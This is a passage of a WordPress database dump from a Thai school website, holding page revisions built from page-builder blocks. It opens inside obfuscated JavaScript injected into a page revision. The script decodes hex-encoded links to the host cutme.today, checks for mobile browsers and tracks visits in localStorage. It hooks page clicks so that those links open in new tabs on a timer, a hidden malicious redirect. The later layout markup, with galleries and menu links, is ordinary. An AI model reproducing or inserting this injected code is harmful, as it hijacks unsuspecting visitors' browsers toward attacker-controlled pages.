f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน','','inherit','closed','closed','','1052-revision-v1','','','2024-08-23 09:10:16','2024-08-23 02:10:16','',1052,'http://pakhaeng.ssk.in.th/?p=1055',0,'revision','',0),
(1056,1,'2024-08-23 09:10:32','2024-08-23 02:10:32','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":758,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-2.png\" alt=\"\" class=\"wp-image-758\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a 